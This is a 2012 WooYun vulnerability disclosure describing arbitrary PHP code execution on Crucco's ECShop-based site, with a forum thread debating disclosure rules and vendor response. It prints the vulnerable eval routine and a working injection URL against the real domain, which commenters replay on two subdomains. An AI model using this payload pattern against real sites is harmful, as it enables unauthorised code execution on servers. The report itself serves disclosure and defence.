当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(13) 关注此漏洞

缺陷编号: WooYun-2012-15124

漏洞标题: 初刻Crucco主站任意代码执行

相关厂商: 初刻Crucco

漏洞作者: kelon

提交时间: 2012-11-22 16:28

公开时间: 2012-11-27 16:29

漏洞类型: 文件上传导致任意代码执行

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php代码执行 黑盒hacking技巧 黑盒分析技巧 php代码执行漏洞 smarty

2人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-11-22: 细节已通知厂商并且等待厂商处理中
2012-11-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

初刻用的是ecshop,但是程序员二次开发中太过随意,导致问题产生。。。

详细说明:

http://www.crucco.com/huodongye.php?pn=zucefangsi

在这里我们发现pn的值没有指定,可以任意提交,我们推断应该程序员写成以下代码

code 区域
$smarty->display($_GET['p']);



我们找到ecshop中的 display方法 发现里面用了eval

code 区域
function _eval($content)
{
ob_start();
eval('?' . '>' . trim($content));
$content = ob_get_contents();
ob_end_clean();

return $content;
}



漏洞证明:

我们提交以下url:

http://www.crucco.com/huodongye.php?pn=str:%3C?php%20phpinfo%28%29;//

会发现可爱的phpinfo出来了

QQ截图20121122162550.png

修复方案:

指定pn的值

版权声明:转载请注明来源 kelon@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-11-27 16:29

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2012-11-22 16:29 | Black Angel ( 普通白帽子 | Rank:165 漏洞数:36 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)
    0

    沙发先坐下。再围观。

  2. 2012-11-22 16:30 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    我日

  3. 2012-11-22 16:30 | kelon ( 实习白帽子 | Rank:73 漏洞数:9 )
    0

    @xsser 秒过?估计要忽略了

  4. 2012-11-22 16:31 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    @kelon 不是,你目前信誉比较高,乌云的审核都是通过人提交的漏洞来进行的

  5. 2012-11-22 16:37 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )
    0

    @xsser 有时候秒过有时候就要等审核,相同类型的漏洞,用什么机制判断的,不会是忽略数吧,那不科学

  6. 2012-11-22 16:40 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    @小胖胖要减肥 我们采取的是智能高科技的纳米云判断技术

  7. 2012-11-22 16:43 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )
    0

    @xsser 你们是不是还能修核潜艇啊,反正我好像一直rp不错,看看这个 WooYun: 乐视网漏洞合集 ,考虑下放宽到10天吧,我提的好几个都是厂商没有看到 ,之前麦考林也是,新蛋的联系你了么

  8. 2012-11-22 22:13 | zzR 认证白帽子 ( 核心白帽子 | Rank:1408 漏洞数:125 | 东方红**联盟欢迎你-0-)
    0

    我会告诉你们,乌云是通过关键字判断审核的嘛 - -#

  9. 2012-11-23 10:59 | se55i0n ( 核心白帽子 | Rank:1571 漏洞数:174 )
    0

    @zzR 好智能~~~

  10. 2012-11-23 11:10 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )
    0

    @zzR @se55i0n zzr骗你的 只要成为剑心的基友保证秒过

  11. 2012-11-23 11:26 | se55i0n ( 核心白帽子 | Rank:1571 漏洞数:174 )
    0

    @小胖胖要减肥 这么说你的菊花已经献给剑心了—_—

  12. 2012-11-23 11:54 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )
    0

    我都没多少秒过的 都是靠人品的

  13. 2012-11-27 17:05 | popok ( 普通白帽子 | Rank:117 漏洞数:24 | nothing)
    0

    @xsser 这样就公布TM是要大家都去脱裤么? 真心无力吐槽wooyun的审核机制了,坑爹的一B啊

  14. 2012-11-27 17:08 | kelon ( 实习白帽子 | Rank:73 漏洞数:9 )
    0

    @xsser 这个到时不会找我吧。。这么快就公开了?

  15. 2012-11-27 17:08 | se55i0n ( 核心白帽子 | Rank:1571 漏洞数:174 )
    0

    @popok 对于这种不重视安全的厂家,需要一记狠狠的耳光才能打醒~怎么能怪wooyun呢,wooyun也有自己的准则~

  16. 2012-11-27 17:12 | se55i0n ( 核心白帽子 | Rank:1571 漏洞数:174 )
    0

    @初刻Crucco 公开了,就知道修复了哇~

  17. 2012-11-27 17:16 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    确实已经修复了,应该是看到提交的漏洞了,处理后没在平台走确认流程而已。

  18. 2012-11-27 17:17 | 初刻Crucco(乌云厂商)
    0

    已经修复了 谢谢@kelon

  19. 2012-11-27 17:18 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    @kelon @se55i0n @初刻Crucco 这个我们单独联系了厂商,因为交接问题导致的

  20. 2012-11-27 17:21 | kelon ( 实习白帽子 | Rank:73 漏洞数:9 )
    0

    @xsser,可怜我的RANK

  21. 2012-11-27 17:22 | se55i0n ( 核心白帽子 | Rank:1571 漏洞数:174 )
    0

    @疯狗 难道厂商不应该确认漏洞的同时,认可白帽子的的贡献么;漏洞信息没有得到确认而公开,要是没及时修复这是对自身安全的不负责;而且白帽子提交了漏洞信息却惨遭忽略,不光是rank不rank的问题~说严重点也是一种心理伤害~

  22. 2012-11-27 17:28 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    @se55i0n 说的在理,但是有点过了,并不是厂商的全体现状,而是由于极少数厂商对平台使用的理解存在盲区所导致,相信这次过后 @初刻Crucco 厂商不会在漏掉白帽子的漏洞了 :) 另外“惨遭忽略”这种问题,还有一种可能,就是厂商从自身机制考虑,可能某些漏洞影响确实不大所导致,这种问题严重的乌云会帮白帽维权,你应该也看到过,我们就事论事。

  23. 2012-11-27 17:30 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    @se55i0n 厂商漏给的rank,乌云会在第二次的审核中给大家补上,也是一些白帽问为什么rank会有变动的原因,好漏洞会给rank,厂商乱给的也会进行人工修正。

  24. 2012-11-27 19:35 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )
    0

    @popok @xsser 可以先延长到10天把 太多例子了

  25. 2012-11-27 19:35 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )
    0

    @se55i0n 这个是xsser自己定的规则,注册厂商5天不认领漏洞自动公开

  26. 2012-11-27 20:03 | krbl ( 实习白帽子 | Rank:99 漏洞数:14 | ♦♠♣♫♪☼☻☺ஐ♥♀♂☆๑۩۞۩๑☜☞...)
    0

    @初刻Crucco,@xsser,@@kelon,@小胖胖要减肥 ....谁说已经修复了?不是还存在?http://i.crucco.com/huodongye.php?pn=str:%3C?php%20phpinfo%28%29;//

  27. 2012-11-27 20:05 | krbl ( 实习白帽子 | Rank:99 漏洞数:14 | ♦♠♣♫♪☼☻☺ஐ♥♀♂☆๑۩۞۩๑☜☞...)
    0

    还有。。http://beta.crucco.com/huodongye.php?pn=str:%3C?php%20phpinfo%28%29;//

  28. 2012-11-27 20:09 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )
    0

    @krbl 厂商那个回复是wooyun自动回复的,然后自动公开,这块现在就是这个样子,老问题了

  29. 2012-11-27 21:18 | kelon ( 实习白帽子 | Rank:73 漏洞数:9 )
    0

    @krbl 我是随便看到,顺手提交的,看起来是开发用的站点。@初刻Crucco 厂商应该好好查查。

  30. 2012-11-27 21:37 | krbl ( 实习白帽子 | Rank:99 漏洞数:14 | ♦♠♣♫♪☼☻☺ஐ♥♀♂☆๑۩۞۩๑☜☞...)
    0

    @ kelon是啊

登录后才能发表评论,请先 登录